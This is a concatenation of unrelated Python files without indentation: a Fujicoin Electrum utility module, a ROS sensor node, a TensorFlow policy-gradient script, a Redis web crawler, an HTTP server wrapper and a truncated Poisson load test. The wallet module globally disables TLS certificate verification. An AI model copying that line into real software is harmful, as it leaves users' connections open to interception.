new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020a'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-fjc")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-FJC")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-FJC")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
DECIMAL_POINT = localeconv()['decimal_point']
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = DECIMAL_POINT
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
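# Examples (assuming the locale decimal point is '.'):
#   format_satoshis(1234500000)              -> '12.345'
#   format_satoshis(1234500000, num_zeros=8) -> '12.34500000'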
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'fujicoin.org': ('https://explorer.fujicoin.org/',
{'tx': 'tx/', 'addr': 'address'}),
'cryptoID': ('https://chainz.cryptoid.info/',
{'tx': 'fjc/tx.dws?', 'addr': 'address'}),
'system default': ('https://chainz.cryptoid.info/',
{'tx': 'fjc/tx.dws?', 'addr': 'address'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBTC/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain://000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'system default')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a fujicoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'fujicoin':
raise Exception("Not a fujicoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid fujicoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match(r'([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
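# Illustrative call (the address is a placeholder that bitcoin.is_address() would
# need to accept; assumes COIN == 100000000):
#   parse_URI('fujicoin:FExampleAddr123?amount=1.5&message=donation')
#   -> {'address': 'FExampleAddr123', 'amount': 150000000,
#       'message': 'donation', 'memo': 'donation'}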
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='fujicoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
TxMinedStatus = NamedTuple("TxMinedStatus", [("height", int),
("conf", int),
("timestamp", int),
("header_hash", str)])
VerifiedTxInfo = NamedTuple("VerifiedTxInfo", [("height", int),
("timestamp", int),
("txpos", int),
("header_hash", str)])
|
parser_node.py | #!/usr/bin/env python
import rospy
import math as m
from communication.serial_handler import SerialThread
import json
from threading import Thread
from nav_msgs.msg import Odometry
from sensor_msgs.msg import Joy
from std_msgs.msg import Empty
from std_msgs.msg import String
global_data = ""
global_xbox_data = {}
global_odom_data = {}
pub = rospy.Publisher('/teensy/input', String, queue_size=1000)
"""
SERIAL_PORT = "/dev/ttyACM0"
SERIAL_BAUDRATE = 921600
SERIAL_INTERVAL = 0.02
serial = SerialThread(port=SERIAL_PORT, baudrate=SERIAL_BAUDRATE)
serial.connect()
print(serial.isConnected())
"""
def xbox_2_dict(data):
buttons = data.buttons
axes = data.axes
msg = {"0": axes[0], "1": axes[1], "2": axes[2], "3": axes[3], "4": axes[4], "5": axes[5],
"6": buttons[0], "7": buttons[1], "8": buttons[2], "9": buttons[3], "10": buttons[4],
"11": buttons[5], "12": buttons[6], "13": buttons[7], "14": buttons[8], "15": buttons[9],
"16": buttons[10]}
return msg
def odom_2_dict(data):
position = data.pose.pose.position
orientation = data.pose.pose.orientation
w = orientation.w
x = -orientation.x
y = orientation.y
z = -orientation.z
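# Standard quaternion -> Euler conversion (pitch, roll, yaw), expressed in degrees.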
pitch = -m.asin(2.0 * (x*z - w*y)) * 180.0 / m.pi
roll = m.atan2(2.0 * (w*x + y*z), w*w - x*x - y*y + z*z) * 180.0 / m.pi
yaw = m.atan2(2.0 * (w*z + x*y), w*w + x*x - y*y - z*z) * 180.0 / m.pi
msg = {"x": position.x, "y": position.y, "z": position.z, "pitch": pitch, "roll": roll, "yaw": yaw}
return msg
def callback0(data):
#rospy.loginfo(rospy.get_caller_id() + "I heard %s", data)
global global_odom_data
msg = odom_2_dict(data)
global_odom_data = msg
#print(msg)
def callback1(data):
#rospy.loginfo(rospy.get_caller_id() + "I heard %s", data)
global global_xbox_data
msg = xbox_2_dict(data)
global_xbox_data = msg
#print(msg)
def timer_callback(event):
global global_data, global_odom_data, global_xbox_data
global_data = {**global_odom_data, **global_xbox_data}
#data = str(global_data).replace("'", '"')
json_msg = json.dumps(global_data)
#serial.sendOutputStream(json.loads(json_msg))
data = json.loads(json_msg)
rospy.loginfo("%s", data)
pub.publish("Hello")
def listener():
rospy.init_node('listener', anonymous=True)
rospy.Subscriber("/camera/odom/sample", Odometry, callback0)
rospy.Subscriber("/joy", Joy, callback1)
timer = rospy.Timer(rospy.Duration(1.0), timer_callback)
rospy.spin()
timer.shutdown()
"""
def reader():
while True:
reply = serial.readInputStream()
print(reply)
read_thread = Thread(target=reader, daemon=True)
"""
if __name__ == '__main__':
#read_thread.start()
listener()
|
policy_gradient.py | import tensorflow as tf
import numpy as np
import os
import time
from shutil import move
from threading import Thread
from watcher import Watcher
from tensorflow.keras.callbacks import TensorBoard
LOGDIR = 'logs/tensorboard/'
class Environment(object):
def __init__(self, start_state, w):
self.w = w
self.start_state=start_state
self.reset()
def reset(self):
self.total_rewards = 0
self.state = self.start_state
return self.state
def step(self, action):
time.sleep(0.50)
if action == 1:
if self.state[2] == 1:
next_state = [self.w.get_nr_of_reads('fich1.txt'),
self.w.get_nr_of_reads('fich2.txt'),
2]
else:
next_state = [self.w.get_nr_of_reads('fich1.txt'),
self.w.get_nr_of_reads('fich2.txt'),
1]
else:
next_state = [self.w.get_nr_of_reads('fich1.txt'),
self.w.get_nr_of_reads('fich2.txt'),
self.state[2]]
if next_state[2] == 1 and next_state[0] > next_state[1]:
reward = 10
elif next_state[2] == 2 and next_state[1] > next_state[0]:
reward = 10
elif next_state[1] == next_state[0]:
reward = 0
else:
reward = -50
self.state = next_state
self.total_rewards += reward
return self.state, reward
def reset_graph(seed=42):
tf.reset_default_graph()
tf.set_random_seed(seed)
np.random.seed(seed)
def discount_rewards(rewards, discount_rate):
discounted_rewards = np.zeros(len(rewards))
cumulative_rewards = 0
for step in reversed(range(len(rewards))):
cumulative_rewards = rewards[step] + cumulative_rewards * discount_rate
discounted_rewards[step] = cumulative_rewards
return discounted_rewards
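# Worked example: discount_rewards([1, 0, 2], 0.9)
#   step 2: 2.0
#   step 1: 0 + 0.9 * 2.0 = 1.8
#   step 0: 1 + 0.9 * 1.8 = 2.62
# -> array([2.62, 1.8, 2.0])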
def discount_and_normalize_rewards(all_rewards, discount_rate):
all_discounted_rewards = [discount_rewards(rewards, discount_rate) for rewards in all_rewards]
flat_rewards = np.concatenate(all_discounted_rewards)
reward_mean = flat_rewards.mean()
reward_std = flat_rewards.std()
return [(discounted_rewards - reward_mean)/reward_std for discounted_rewards in all_discounted_rewards]
def main():
w = Watcher('mops/mp1', 'mops/mp2')
thread1 = Thread(target = w.run )
thread1.start()
# To make the output stable across runs
reset_graph()
# [nr_file1, nr_file2, p_file1]
n_inputs = 3
n_hidden = 2
# whether it chooses to switch file positions
n_outputs = 1
learning_rate = 0.1
#Initializer capable of adapting its scale to the shape of weights tensors.
initializer = tf.variance_scaling_initializer()
# inserts a placeholder for a tensor that will be always fed
# Basically we create a placeholder that accepts any number (None) of inputs,
# each of size n_inputs.
X = tf.placeholder(tf.float32, shape=[None, n_inputs])
hidden = tf.layers.dense(X, n_hidden, activation=tf.nn.elu, kernel_initializer=initializer)
logits = tf.layers.dense(hidden, n_outputs)
outputs = tf.nn.sigmoid(logits) # probability of action 0 (not to migrate)
p_migrations = tf.concat(axis=1, values=[outputs, 1 - outputs])
action = tf.multinomial(tf.log(p_migrations), num_samples=1)
# tf.summary.scalar('action', action)
y = 1. - tf.to_float(action)
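# outputs is p(action 0); y turns the sampled action into a sigmoid target
# (action 0 -> y = 1, action 1 -> y = 0), so minimizing the cross-entropy below
# nudges the network toward the action that was actually sampled. The resulting
# gradients are rescaled later by the normalized discounted rewards before being applied.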
cross_entropy = tf.nn.sigmoid_cross_entropy_with_logits(labels=y, logits=logits)
# tf.summary.scalar([name1, name2], cross_entropy)
optimizer = tf.train.AdamOptimizer(learning_rate)
# correct_prediction = tf.equal(tf.argmax(logits,1), tf.argmax(y,1))
# accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
grads_and_vars = optimizer.compute_gradients(cross_entropy)
gradients = [grad for grad, variable in grads_and_vars]
tf.summary.histogram("gradients", gradients)
gradient_placeholders = []
grads_and_vars_feed = []
for grad, variable in grads_and_vars:
gradient_placeholder = tf.placeholder(tf.float32, shape=grad.get_shape())
gradient_placeholders.append(gradient_placeholder)
grads_and_vars_feed.append((gradient_placeholder, variable))
training_op = optimizer.apply_gradients(grads_and_vars_feed)
init = tf.global_variables_initializer()
saver = tf.train.Saver()
n_runs_per_update = 10
n_max_steps = 10
n_iterations = 20
save_iterations = 5
discount_rate = 0.95
env = Environment([w.get_nr_of_reads('fich1.txt'), w.get_nr_of_reads('fich2.txt'), 1], w)
# tf.reset_default_graph()
with tf.Session() as sess:
sess.run(init)
# merged_summary = tf.summary.merge_all()
writer = tf.summary.FileWriter(LOGDIR + "lr_0.2")
writer.add_graph(sess.graph)
# init.run()
for iteration in range(n_iterations):
print("=" * 79)
print("\rIteration: {}".format(iteration), end="")
all_rewards = []
all_gradients = []
for game in range(n_runs_per_update):
current_rewards = []
current_gradients = []
obs = env.reset()
print(obs)
for step in range(n_max_steps):
action_val, gradients_val = sess.run([action, gradients], feed_dict={X: np.asarray(obs).reshape(1, n_inputs)})
print("WOW")
print(action_val)
print("WOW")
print(action_val[0][0])
obs, reward = env.step(action_val[0][0])
print(obs)
current_rewards.append(reward)
current_gradients.append(gradients_val)
print(current_rewards)
all_rewards.append(current_rewards)
all_gradients.append(current_gradients)
w.reset()
all_rewards = discount_and_normalize_rewards(all_rewards, discount_rate=discount_rate)
feed_dict = {}
for var_index, gradient_placeholder in enumerate(gradient_placeholders):
mean_gradients = np.mean([reward * all_gradients[game_index][step][var_index] for game_index, rewards in enumerate(all_rewards) for step, reward in enumerate(rewards)], axis=0)
feed_dict[gradient_placeholder] = mean_gradients
sess.run(training_op, feed_dict=feed_dict)
# writer.add_summary(gradients_val, iteration)  # gradients_val is a list of ndarrays, not a Summary proto
config = tf.contrib.tensorboard.plugins.projector.ProjectorConfig()
tf.contrib.tensorboard.plugins.projector.visualize_embeddings(writer, config)
if iteration % save_iterations == 0:
saver.save(sess, "./my_policy_net_pg.ckpt")
if __name__ == '__main__':
main() |
crawler.py | import requests
from lxml.html import fromstring
from redisqueue.scheduler import PipeScheduler
from concurrent.futures import ThreadPoolExecutor
import logging
import re
import importlib
import six
import time
from redisqueue import connection
class Crawler(PipeScheduler):
"""从redis-queue中获取url,进行爬取,然后再存放到另一个redis-queue中"""
def __init__(self, server,
persist=False,
flush_on_start=False,
queue_in_key='queue_in:%(timestamp)s' % {'timestamp': int(time.time())},
queue_in_cls='redisqueue.rqueues.FifoQueue',
queue_out_key='queue_out:%(timestamp)s' % {'timestamp': int(time.time())},
queue_out_cls='redisqueue.rqueues.FifoQueue',
idle_before_close=0,
serializer=None,
num_crawl_threads=10,
blacklist=r'',
whitelist=r'.*'):
"""Initialize scheduler.
Parameters
----------
blacklist : str
Regex blacklist used to filter page titles.
whitelist : str
Regex whitelist used to filter page titles.
num_crawl_threads: int
Number of threads crawling page content concurrently.
"""
super().__init__(server, persist, flush_on_start, queue_in_key, queue_in_cls, queue_out_key, queue_out_cls, idle_before_close, serializer)
self.num_crawl_threads = num_crawl_threads
self.blacklist = re.compile(blacklist)
self.whitelist = re.compile(whitelist)
@classmethod
def from_settings(cls, settings):
kwargs = {
'persist': settings.get('SCHEDULER_PERSIST', True),
'flush_on_start': settings.get('SCHEDULER_FLUSH_ON_START', False),
'queue_in_key': settings.get('SCHEDULER_QUEUE_IN_KEY', 'queue_in:%(timestamp)s' % {'timestamp': int(time.time())}),
'queue_in_cls': settings.get('SCHEDULER_QUEUE_IN_CLASS', 'redisqueue.rqueues.FifoQueue'),
'queue_out_key': settings.get('SCHEDULER_QUEUE_OUT_KEY', 'queue_out:%(timestamp)s' % {'timestamp': int(time.time())}),
'queue_out_cls': settings.get('SCHEDULER_QUEUE_OUT_CLASS', 'redisqueue.rqueues.FifoQueue'),
'idle_before_close': settings.get('SCHEDULER_IDLE_BEFORE_CLOSE', 0),
'serializer': settings.get('SCHEDULER_SERIALIZER', None),
'num_crawl_threads': settings.get('NUM_CRAWL_THREADS', 10),
'blacklist': settings.get('BLACKLIST', r''),
'whitelist': settings.get('WHITELIST', r'.*')
}
# Support serializer as a path to a module.
if isinstance(kwargs.get('serializer'), six.string_types):
kwargs['serializer'] = importlib.import_module(kwargs['serializer'])
server = connection.from_settings(settings)
# Ensure the connection is working.
server.ping()
return cls(server=server, **kwargs)
def crawl_single(self, _):
"""
Crawl the page at the given url and extract its title and content.
"""
while True:
url = self.dequeue('in')
if url:
self.logger.info(f"crawl:{url}")
try:
r = requests.get(url, timeout=10)
if r.ok:
tree = fromstring(r.content)
title = tree.findtext('.//title') or ''
# Keep the page only if the title is not blacklisted (an empty blacklist
# pattern means "no blacklist") and matches the whitelist.
blacklisted = self.blacklist.pattern and self.blacklist.search(title)
if not blacklisted and self.whitelist.search(title):
result = {'url': url, 'title': title}
self.logger.info(f"produce:{url}")
self.enqueue(result)
else:
self.logger.info(f"filter:{url}")
else:
self.logger.info(f"discard:{url}")
except Exception as e:
self.logger.info(f"discard:{url} ({e})")
def crawl_bulk(self, n=0):
n = self.num_crawl_threads if not n else n
with ThreadPoolExecutor(n) as pool:
pool.map(self.crawl_single, range(n))
def main(settings):
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(name)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S')
c = Crawler.from_settings(settings)
c.open()
# c.crawl_single(1)
c.crawl_bulk()
c.close()
if __name__ == "__main__":
from multiprocessing import Process
settings = {'REDIS_HOST': '127.0.0.1',
'REDIS_PORT': 6379,
'SCHEDULER_SERIALIZER': 'json',
'SCHEDULER_QUEUE_IN_KEY': 'digholes:queue_url_pool',
'SCHEDULER_QUEUE_IN_CLASS': 'redisqueue.rqueues.LifoQueue',
'SCHEDULER_QUEUE_OUT_KEY' : 'digholes:queue_response_pool'
}
p = Process(target=main, args=(settings,))
p.start()
p.join()
|
httpserver.py | import SimpleHTTPServer
import multiprocessing
import os
class HTTPServer(SimpleHTTPServer.BaseHTTPServer.HTTPServer):
def server_start(self, root_dir):
os.chdir(root_dir)
self.serve_forever()
class HTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def log_message(self, format_str, *args):
pass
class HTTPService(object):
def __init__(self, root_dir, host=''):
self.root_dir = root_dir
self.host = host
self.port = 0
def start(self):
self.server = HTTPServer((self.host, self.port), HTTPRequestHandler)
if self.port == 0:
self.port = self.server.server_port
self.process = multiprocessing.Process(target=self.server.server_start, args=[self.root_dir])
self.process.start()
def stop(self):
self.server.server_close()
self.process.terminate()
self.process.join()
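# Illustrative usage sketch (the directory path is made up):
#   service = HTTPService('/tmp/wwwroot')
#   service.start()   # binds an OS-assigned port, available as service.port
#   # ... issue requests against http://localhost:<service.port>/ ...
#   service.stop()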
|
poisson_tests_v0.py | import math, sys, threading, time, requests, random
from time import sleep
from dataclasses import dataclass
@dataclass
class ConnectivityServiceData:
start_TS: int = -1
inter_arrival_time: float = -0.1
end_TS: int = -1
type: str = ''
result: str = ''
uuid: str = ''
ber: bool = True
def millis():
return int(round(time.time() * 1000))
def poisson_wait_time(lmb):
p = random.random()
inter_arrival_time = -math.log(1.0 - p) / lmb
# print('inter_arrival_time: {}'.format(inter_arrival_time))
return inter_arrival_time
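# Inverse-transform sampling: if p ~ Uniform(0, 1), then -ln(1 - p) / lmb is
# exponentially distributed with rate lmb, which is the distribution of
# inter-arrival times in a Poisson process. For example, with lmb = 2
# (two arrivals per second) the returned wait averages 0.5 seconds.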
class Connectivity:
def __init__(self, lmb, connections):
self.log = []
self.start_time = -1
self.end_time = -1
self.total_holding_time = 0 # purpose unclear; candidate for removal
self.endpoints = {'available': {
'cs_01': ['tx_node-nep_1', 'rx_node-nep_1'],
'cs_02': ['tx_node-nep_2', 'rx_node-nep_2'],
'cs_03': ['tx_node-nep_3', 'rx_node-nep_3'],
'cs_04': ['tx_node-nep_4', 'rx_node-nep_4']},
'occupied': {
}}
self.max_connections = connections
self.watcher_thread = threading.Thread(target=self.watcher_function, args=(lmb,))
self.first_conn = None
self.n_threads = 0
self.connection_no_ber = 0
def start(self):
print('Starting watcher')
self.watcher_thread.start()
def watcher_function(self, lmb):
n_connections = 0
self.start_time = millis()
while n_connections < self.max_connections:
s_next = poisson_wait_time(lmb)
time.sleep(s_next)
connection = ConnectivityServiceData(inter_arrival_time=s_next)
next_thread = threading.Thread(target=self.connectivity, args=(connection, ))
next_thread.start()
n_connections = n_connections + 1
self.exit_function()
def connectivity(self, connection):
connection.type = 'CREATE'
connection.start_TS = millis()
self.n_threads = self.n_threads + 1
try:
cs_uuid, endpoint = random.choice(list(self.endpoints['available'].items()))
del self.endpoints['available'][cs_uuid]
self.endpoints['occupied'][cs_uuid] = endpoint
except IndexError:
cs_uuid, endpoint = 'cs_error', ['a', 'b']
print('No EP available: {}'.format(cs_uuid))
connection.uuid = cs_uuid
src = endpoint[0]
dst = endpoint[1]
capacity = random.choice([100, 200])
url = "http://" + ip + "/restconf/config/context/connectivity-service/" + cs_uuid
# print(url)
print('SEND cs: {}'.format(cs_uuid))
response = requests.post(url, json={"uuid": cs_uuid, "src": src, "dst": dst, "capacity": capacity})
connection.end_TS = millis()
# print(response.status_code)
if response.status_code != 201: # ERROR CASE
print('Error cs: {} -> {}'.format(cs_uuid, response.json()['description']))
connection.result = response.json()['description']
self.log.append(connection)
del self.endpoints['occupied'][connection.uuid]
self.endpoints['available'][connection.uuid] = endpoint
self.n_threads = self.n_threads - 1
return 0
else: # SUCCESSFUL CASE
print('Successful cs: {}'.format(cs_uuid))
connection.result = response.json()['description']
self.log.append(connection)
s_next = poisson_wait_time(mu)
connection = ConnectivityServiceData()
connection.inter_arrival_time = s_next
connection.uuid = cs_uuid
connection.type = 'DELETE'
self.delete_cs(connection)
def delete_cs(self, connection):
start_ht = millis()
time.sleep(connection.inter_arrival_time)
self.total_holding_time = self.total_holding_time + connection.inter_arrival_time
check_ht = millis() - start_ht
if check_ht/1000 < 1:
connection.ber = False
connection.start_TS = millis()
try:
endpoints = self.endpoints['occupied'][connection.uuid]
except Exception as e:
print(str(e))
print(self.endpoints['occupied'])
url = "http://" + ip + "/restconf/config/context/connectivity-service/" + connection.uuid
print('SEND delete cs: {}'.format(connection.uuid))
response = requests.delete(url)
connection.end_TS = millis()
if response.status_code != 200:
print('Error delete cs: {} -> {}'.format(connection.uuid, response.json()['description']))
connection.result = response.json()['description']
print(response.content)
else:
print('Successful delete cs: {}'.format(connection.uuid))
connection.result = response.json()['description']
del self.endpoints['occupied'][connection.uuid]
self.endpoints['available'][connection.uuid] = endpoints
self.log.append(connection)
self.n_threads = self.n_threads - 1
def exit_function(self):
print('exit_function')
self.end_time = millis()
while self.n_threads != 0:
sleep(0.5)
print('Ending test')
spect_error = 0
path_error = 0
created = 0
deleted = 0
delete_error = 0
no_ber = 0
self.log.sort(key=lambda x: x.start_TS, reverse=False)
with open('results/log_{}_a{}_h{}_c{}.csv'.format(millis(), lmb_inv, mu_inv, connections), 'w') as filehandle:
print('WRITING log')
